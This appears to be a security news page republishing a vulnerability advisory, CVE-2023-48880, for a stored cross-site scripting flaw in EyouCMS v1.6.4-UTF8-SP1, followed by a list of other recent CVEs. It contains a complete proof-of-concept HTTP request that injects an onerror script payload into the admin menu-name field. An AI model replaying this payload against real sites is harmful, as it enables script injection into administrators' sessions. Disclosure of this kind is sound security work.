Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-48880: EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting · Issue #52 · weng-xianhu/eyoucms

A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu Name field at /login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.

CVE
#xss#vulnerability#web#windows#apple#js#java#php#chrome#webkit
POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.3.135
Content-Length: 94
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.135
Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=Member&a=ajax_menu_index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=users_index%7CMember
Connection: close

table=users_menu&id_name=id&id_value=11&field=title&value=<img src=1 onerror=alert(1)>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907